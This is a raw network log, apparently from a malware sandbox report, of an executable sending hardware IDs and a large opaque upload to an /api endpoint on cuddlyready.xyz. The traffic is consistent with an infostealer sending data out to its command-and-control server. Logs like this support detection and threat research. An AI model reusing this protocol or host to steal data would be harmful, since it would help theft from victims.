                                                                                                                                                                                        2024-12-23 08:23:38 UTC5064OUTData Raw: 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e
                                                                                                                                                                                        Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                                        2024-12-23 08:23:39 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:39 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=r9jao9pou795g7qono8fc0raga; expires=Fri, 18 Apr 2025 02:10:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73W4fC4PBbdXyvhxpmw1M3WhZycaxEW2ZZs7RA3T9bQFpuLK2%2Bk3uKNGPglBI6h3PbMF4Rf1m62pRSrJfWbqnqAM2P1sFzlfq9BRsvaaPoGTExguzLGYCo%2Fkmocj%2F0XURzU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f3654bcd5e80-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2114&rtt_var=835&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21354&delivery_rate=1277899&cwnd=218&unsent_bytes=0&cid=86fd6a1c41c1a18b&ts=914&x=0"
                                                                                                                                                                                        2024-12-23 08:23:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                        2024-12-23 08:23:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.749716172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:41 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=6GN8K2WS2O3290JLU
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 1239
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:41 UTC1239OUTData Raw: 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                        Data Ascii: --6GN8K2WS2O3290JLUContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--6GN8K2WS2O3290JLUContent-Disposition: form-data; name="pid"1--6GN8K2WS2O3290JLUContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                        2024-12-23 08:23:42 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:42 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=qbalqm8aeaa8hlj0v4s8g4aen2; expires=Fri, 18 Apr 2025 02:10:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsFtrDa2TATQIh1prNTXGo2R3k5vUh57HHTQoxjxAW0YPzVL5jWS9trmZ6iGVeEAdm7Q6tAzhqHzeupdzl8085P8Mu3iwCw7lKQd3iXexvuy1Eqwy%2Br00GROvWvPw1Qmy5w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f376ade47ce7-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2154&delivery_rate=1585233&cwnd=199&unsent_bytes=0&cid=7a91aae6c75ecbb1&ts=771&x=0"
                                                                                                                                                                                        2024-12-23 08:23:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                        2024-12-23 08:23:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        6192.168.2.749723172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:44 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=0Q7VO4LRXIG1C
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 552437
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 51 37 56 4f
                                                                                                                                                                                        Data Ascii: --0Q7VO4LRXIG1CContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--0Q7VO4LRXIG1CContent-Disposition: form-data; name="pid"1--0Q7VO4LRXIG1CContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0Q7VO
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: ef 52 2e 0a 04 d7 f7 c0 48 5b d2 c0 b7 ae 21 f9 7d 19 44 85 d4 93 8a 3a 28 c6 43 4a 1b 73 16 43 d1 80 1e b3 54 fd d4 84 b1 b8 54 9b 71 ce 09 62 18 48 21 98 f6 72 4a a6 43 1e 0e c4 a6 71 6e 9b 1a c6 89 66 3b 54 f0 c8 b6 c1 14 d1 dd 32 0d aa 1f e7 63 5a 44 d9 7f 46 4c c1 1e 29 da e5 6d 28 76 74 8f 5a ca 8f 8e 4b db 5d d7 65 23 82 13 b4 a8 55 d0 f1 02 37 28 ab 7d bb db cd 83 f7 c6 1b fc 10 5d 8f 93 b4 d4 ac b7 18 5b 23 bf a1 38 ab bf 5a 7a ca f8 84 85 83 14 85 c4 c8 42 44 e5 aa c6 6c de 0a f0 3b 40 55 86 82 08 60 66 00 cd e2 d8 8e 5e fe d3 34 b4 4c ce 0e 22 4d 34 d6 7f 4e 69 e3 4e 18 dd 7c df 2d 11 1b 70 a9 35 35 d2 34 22 7c 80 e7 ec 41 2a 44 9a eb bf ff cc f2 8c ce d5 15 c8 a5 d3 b2 3e 33 b2 fe e7 87 1b 3c 1b 66 2d 8a 54 85 b1 d1 a2 89 a9 1c 46 52 67 12 db
                                                                                                                                                                                        Data Ascii: R.H[!}D:(CJsCTTqbH!rJCqnf;T2cZDFL)m(vtZK]e#U7(}][#8ZzBDl;@U`f^4L"M4NiN|-p554"|A*D>3<f-TFRg
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: 41 21 f0 a1 e0 5b 27 04 87 e1 c1 9c 78 84 ef ff 9b 70 8c bf e1 63 b3 e0 02 c8 25 aa a7 9d d9 4e 01 45 66 0c 2a 3f 38 3c 7f e6 8c 41 bc be 3a 36 f4 5f ce 42 88 af 13 0d 3a c0 fa 03 a2 da 8e 8f 97 7c 94 7f f2 a7 60 c9 45 f1 3d 05 a2 d0 45 d0 ea 26 fb e0 f7 bf 2b f6 79 92 e7 b6 d1 cc ee 3f 89 5a c0 27 41 90 c2 07 ed e1 15 5c 01 d7 47 9c 6e ee 9c 9a 67 37 fd a3 49 5c 81 62 b7 02 f8 57 46 a3 40 32 02 de 77 e2 3e 46 68 22 de a6 4b 52 79 2b d7 4f a8 80 cc 30 44 d5 2c 5e 3b 4a 4a 87 67 f1 a5 48 92 56 1b 1b a8 b2 99 85 ac 65 85 34 ac 94 68 76 bd ef b4 06 f7 13 5e bd 83 97 47 b1 40 98 7b eb e5 fb 8b 98 d4 25 a5 9b 3d 78 0d 57 60 02 e8 4a 89 99 99 0d 46 15 28 0f 4c ea d4 50 94 1d 62 d3 75 6c df 2b 4c ed 74 ad e5 fc 51 1f 1d 53 de 65 eb 8a 1a 97 2f b8 84 7f f1 99 21
                                                                                                                                                                                        Data Ascii: A!['xpc%NEf*?8<A:6_B:|`E=E&+y?Z'A\Gng7I\bWF@2w>Fh"KRy+O0D,^;JJgHVe4hv^G@{%=xW`JF(LPbul+LtQSe/!
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: b8 ff fb 31 a0 32 58 a3 90 f7 c0 24 39 a0 1c bd b9 51 a3 2f 08 e6 1e 97 d3 db 83 30 15 75 10 a5 ea 7f d3 64 2e f4 1c e3 84 9e 45 ee 35 be fe 48 5c fa 52 66 1c fe 8b 50 ad 89 a6 99 c1 44 40 b4 8f 7a ed 2a 47 79 9d 34 13 49 46 d1 86 4c 68 97 20 8a 0c c6 53 88 a3 9c 1b fa 79 d6 dd 0d ea 56 e2 78 8d 05 fd ba 3c de 59 10 e5 e2 ce 2d 3e 50 70 11 08 a0 a9 dc c0 e3 bf 06 92 3f da 2e eb b1 0d e1 2a 94 55 a8 3c 75 3f 12 31 2c 35 97 f0 a1 92 f1 c0 9e 91 1b 4b 4c 5b e5 ec 45 fe f1 ef 71 0e 73 67 8a f4 92 1b 94 e5 8f 9b 40 35 fe f8 42 e8 40 d5 89 01 4c 07 9a 29 b9 f1 ed b1 b5 39 b1 bb 0c f3 a9 12 c3 c5 e1 ff 2a 33 7d 39 f7 81 93 3f db b8 5b 35 3e 98 aa 51 8f c5 11 5b 46 f1 f7 1e 50 f4 f1 29 47 68 a9 fd 96 c6 32 34 d9 09 64 3f c6 ca 19 dc e6 20 8e 64 7e 31 a1 8d 1c 52
                                                                                                                                                                                        Data Ascii: 12X$9Q/0ud.E5H\RfPD@z*Gy4IFLh SyVx<Y->Pp?.*U<u?1,5KL[Eqsg@5B@L)9*3}9?[5>Q[FP)Gh24d? d~1R
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: d0 2a 14 f6 69 72 0a 53 4a 4c c9 d2 40 42 2f f3 b2 28 d1 6d 77 c4 b0 f0 dd ba 8d 63 64 cc de 96 52 a0 fd 23 01 46 25 8d 97 ec 18 ed 43 8c 5d ff 3b 14 6b 05 9f 19 be 02 6f 27 ee 93 8a 95 e8 dc c1 a4 d9 4e bf 08 fa 48 e9 99 71 8a af 46 02 36 7a f5 ff 2f e3 86 81 62 3b 14 2d 3b 09 b8 91 e9 8f 11 ee 42 f1 36 00 14 6f 11 0a 2f db 4c 2d a2 f0 1c b7 7c 71 72 7b ef 6c 88 0c 52 46 66 7e 6b a0 75 b6 1b ce 77 7d c1 22 d5 f2 cc 36 c2 ba 67 f7 26 9a 7d 90 95 8e 0c b9 82 e4 6a b1 78 ad b6 9d 68 41 64 d5 90 36 bc df ab 79 ab 61 18 2b 08 4d 9b 57 12 35 f8 f7 c9 2e 52 2e 9a 90 50 24 49 c9 8d 45 89 49 d9 df e9 91 a8 dd b9 02 52 3a be e5 38 a5 6d ab 84 66 e5 18 a5 93 d3 46 6a c5 5c 2b 48 5d 14 5c f1 d9 90 55 a8 c5 44 77 0b e7 01 ab 11 d9 fe 08 f1 7d 07 31 69 c1 ac 6d 7a 1a
                                                                                                                                                                                        Data Ascii: *irSJL@B/(mwcdR#F%C];ko'NHqF6z/b;-;B6o/L-|qr{lRFf~kuw}"6g&}jxhAd6ya+MW5.R.P$IEIR:8mfFj\+H]\UDw}1imz
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: c9 b5 10 a5 e1 ec cd 4a 7f 60 97 18 b6 b5 65 22 4a cc 72 3a 87 a9 90 64 e4 82 8e 1b 6b 7f bb 3d 85 33 a3 c8 3c 18 d5 29 c9 dd 81 1f 32 a3 97 bd cd f3 e2 f2 cb 77 03 e4 bd 70 ae 3c c5 51 c6 0d 24 2f 74 f7 0a 9e 4c c2 52 43 f8 24 b4 9e f7 ab 8d 63 3e f9 0a aa 33 c5 a4 c2 34 00 73 5c d0 a2 a2 c8 89 91 67 1f f7 46 76 90 5e 68 cb c3 b5 e8 5d b7 f2 40 8c f5 99 70 6b 6e 2c b9 6a 76 2a 36 f9 a4 82 ec fd ba 58 71 6a fc 1a c7 40 84 f0 89 1b a4 a8 4b 74 b1 13 4d 8b d9 42 27 ec 23 7f 96 99 33 cc 83 dc 78 8c bb 76 1f 8b e2 0f 9e 5a 7b 47 5f 6d 20 a8 1f 43 5b d5 cb 66 fc 23 0e cf fe 1d 3e d0 6c 53 09 96 1d 74 43 63 a3 e1 8a 9e a0 9b 22 bd d9 ff 69 df f1 70 7b 7b 7b d3 93 d3 ec 84 d8 ec 1f e7 4e 31 f5 b3 ce 31 0a 2e 2e 7c 31 e1 6f 8a d7 3a df 5a c2 14 21 0f ad e1 8d a4
                                                                                                                                                                                        Data Ascii: J`e"Jr:dk=3<)2wp<Q$/tLRC$c>34s\gFv^h]@pkn,jv*6Xqj@KtMB'#3xvZ{G_m C[f#>lStCc"ip{{{N11..|1o:Z!
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: 0e 9f 7b 74 c4 dc 2f dd 08 3b bf bf ce 6d fb 9b d9 a3 81 2f 97 ae fb a7 23 ef 17 ef 7d 17 59 a4 b9 58 24 2a 27 07 13 92 29 a5 9d 07 b0 07 8a 91 f1 6f ef 8c 66 7a 86 91 43 cf e9 6a 79 87 49 ec 35 7b 19 9b 24 ce 59 b0 06 b7 32 4e 1e 35 29 ba eb c3 db e3 d9 f7 e7 c2 17 bf 4f ff 04 9f 95 73 98 7f 3e 74 76 fd 42 a9 58 ff f1 92 cc ac bb e1 b4 1f 55 7b 87 3a 33 b7 50 5c 6e 5a 0b 4b a4 a2 21 b7 54 45 2d f7 d5 db 7c eb fe be 6f be d1 cb 24 3d e6 ff fa 82 68 98 f1 f3 da 78 d3 5f ca b7 8e 43 6e 8b f3 15 d8 af 9b 25 f5 ff 7d 6e fe db d5 ae 1a 49 a7 c2 de c1 d2 dc c4 9a 0e 9b 2e 1f 94 7a ef f3 7e 38 c2 14 56 5f b4 df 19 78 e0 2e e9 ad d7 ae 26 84 6e b5 9e 4f 52 f3 7b 33 a3 e5 28 94 45 5d 74 2b f4 7f 33 63 e3 b4 9c 6b ed 14 54 ba 74 65 bb d8 d6 29 a8 62 fa 15 4c 95 59
                                                                                                                                                                                        Data Ascii: {t/;m/#}YX$*')ofzCjyI5{$Y2N5)Os>tvBXU{:3P\nZK!TE-|o$=hx_Cn%}nI.z~8V_x.&nOR{3(E]t+3ckTte)bLY
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: 9d 8b d5 1b d3 2d f4 66 1a 95 1f 42 5d df c4 24 53 32 57 dc 39 8f 82 6c 46 5a 63 78 97 d1 c9 26 72 f2 a6 0d 89 24 12 a1 be c1 d3 ee 32 56 83 0f 4f 8f 20 c6 21 dc e6 44 55 49 54 43 c3 5f e2 ae 29 14 1c 6b 6a 4f 49 31 e7 27 db 33 07 81 9f 50 ce e4 fb 31 cb 49 ae f3 b1 1b b7 3f c4 c4 ed 18 a3 c2 a3 82 51 70 19 21 6a f2 b8 44 fe 62 7f a0 77 c2 9d 3f 7d 2e d1 f0 e1 58 4e e0 4e d8 56 49 e1 ee 3d 7f 70 9f aa 41 f4 dd a8 60 e5 35 ab a2 44 c4 7d 89 a1 8b c0 55 be 56 e8 da d7 77 62 ea 35 06 fb ef 38 f9 31 3b 46 5d ae d5 e0 36 8e b1 dc 46 9d be 2d db a0 a1 e3 86 2d 9b e1 d6 48 20 c8 3e f0 ef 3d bb 23 6a aa e0 15 e2 45 8b 5b e5 28 42 df 59 aa bb 41 bf 5e 86 74 d9 7b 63 e7 e3 f8 6b 9e d6 d2 a9 ba ca 4a 3f af 4a 40 18 a4 64 bc 64 2c 4b b9 8f 4e 22 e6 a4 bd ef 2d cc 04
                                                                                                                                                                                        Data Ascii: -fB]$S2W9lFZcx&r$2VO !DUITC_)kjOI1'3P1I?Qp!jDbw?}.XNNVI=pA`5D}UVwb581;F]6F--H >=#jE[(BYA^t{ckJ?J@dd,KN"-
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: 41 ae b3 a9 3e 41 94 7d da b8 63 ca d1 0b f3 5d ee bc 97 e0 0e 31 45 61 5b 14 f7 e5 0f 47 88 d0 4c 1e e7 d6 2f b0 a3 3e 24 14 fb 8b 95 59 20 c8 a6 1b 60 85 c0 20 e9 a2 be c9 12 1f 13 18 2a 6a 35 b1 e1 6e 6a 40 7d 7a d8 8d 9c 8c 70 cd 69 5a 8d e4 ff 13 e7 e5 4e 7b 60 3b f5 79 7a 7a 42 9f ed 2d c0 d2 21 3e ca 34 5d 4f c1 e3 85 bc 6e 60 89 51 59 08 d2 a9 c0 93 27 a3 43 d5 e6 02 21 ae df ef 01 2a 7b 54 f4 6b 10 73 73 81 bd 4c 4e 44 e9 9b ea 5f cb de 6a 75 a5 3a 0d bb b0 af 9b 9d 54 3d 5f a9 a6 7b 61 fe 7f c7 48 a4 e9 42 9f ad 7e 37 30 07 00 68 bd 0a ca d8 67 9f 3a c7 fc 8a 62 ac dd ee 7a 72 f1 c6 06 4f 74 7b 8f 44 e1 91 4b 13 9d 79 45 a5 ec 12 b7 8f a7 3c 7b 96 99 62 8a 15 21 61 89 e8 94 82 50 03 a1 b6 49 11 11 22 75 b0 f9 eb f1 a8 85 47 e4 a2 48 ee 8b 9a 7f
                                                                                                                                                                                        Data Ascii: A>A}c]1Ea[GL/>$Y ` *j5nj@}zpiZN{`;yzzB-!>4]On`QY'C!*{TkssLND_ju:T=_{aHB~70hg:bzrOt{DKyE<{b!aPI"uGH
                                                                                                                                                                                        2024-12-23 08:23:44 UTC15331OUTData Raw: e0 69 2c d6 f8 01 3f 81 92 ff 8f 55 79 ea ae 2e ad dc 76 c9 04 39 f7 e4 f7 3d dd 08 93 57 7a a0 6c fc cf 03 1c 08 bb 89 0a de ba 4b d0 68 7b 9f f2 11 f7 22 5d 51 a4 9a 64 9f 84 b0 0d 16 8a b1 a1 ce 7b 6b fc d4 fb 35 1a ef 5c 25 be b9 8e e7 f3 5f f9 51 59 fd a1 c6 a1 37 ab 3e 36 92 d7 42 64 d3 2b 81 bb a6 11 27 72 b8 dc 69 4d fc 3a e9 fa 93 94 8a bb c1 22 11 c3 ab d6 3e 9c 08 d3 57 dc e4 8b 67 07 7c 8e f2 53 b9 89 10 c7 e7 f9 9a 16 e6 41 e2 bb c2 d2 68 c6 fd fb cc c2 c5 17 9f af 23 1d a5 40 fe 36 68 a2 54 e4 99 02 e8 6e 85 f8 d1 ac 29 bc 14 bf 61 61 78 37 5d b8 5b 5b e4 c8 8a fb 2b c5 67 1f a1 6e 08 df 79 20 6c e7 27 04 39 53 41 56 31 fa 45 8f 73 66 c4 09 c5 43 86 66 ed 88 da 20 50 f4 ec 09 9f c1 a6 f2 4d 69 72 19 34 ef b6 de b1 a1 0b 52 eb 0c 76 13 8c 39
                                                                                                                                                                                        Data Ascii: i,?Uy.v9=WzlKh{"]Qd{k5\%_QY7>6Bd+'riM:">Wg|SAh#@6hTn)aax7][[+gny l'9SAV1EsfCf PMir4Rv9
                                                                                                                                                                                        2024-12-23 08:23:47 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:47 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=nfveqerjuvtqeecfj0ebdcegum; expires=Fri, 18 Apr 2025 02:10:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbRx%2BjulMDPs4P2Z5i8zuknUJTYRHVI%2Fc5oj04SUaHyC5PZemEiDB00p%2BycR9vVyAaMz9oRekvrHl%2F7D7KIPZ1q5E6ffNz1eCbIlxEhf%2BR6bQSXQpPUH5OYTZUmZunx0d70%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f3874bdf43df-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2036&min_rtt=2020&rtt_var=790&sent=332&recv=575&lost=0&retrans=0&sent_bytes=2835&recv_bytes=554934&delivery_rate=1356877&cwnd=243&unsent_bytes=0&cid=deb0fb96b1f0bedb&ts=3625&x=0"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        7192.168.2.749740172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:49 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:49 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=9AA29BAF5EACF5F1AC8923850305D13E
                                                                                                                                                                                        2024-12-23 08:23:49 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=3aihamo49q3l144ri645g7pe77; expires=Fri, 18 Apr 2025 02:10:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dil%2FfCgjuMLgtJacqBlMJ%2BV9XwcoJQDPopsei819DTFOl6LSk4wlt%2BG%2BJ%2BIu%2BbnFJMSReVB9IGd%2BG%2FxRzJYvZB2KGlxTJ0uffu1HhEq16Tgtz6x%2FI6Lc5q1mRfPgWF%2Bang%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f3a67fda41e7-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2149&min_rtt=2142&rtt_var=818&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1324863&cwnd=202&unsent_bytes=0&cid=124828a7ce5e646d&ts=758&x=0"
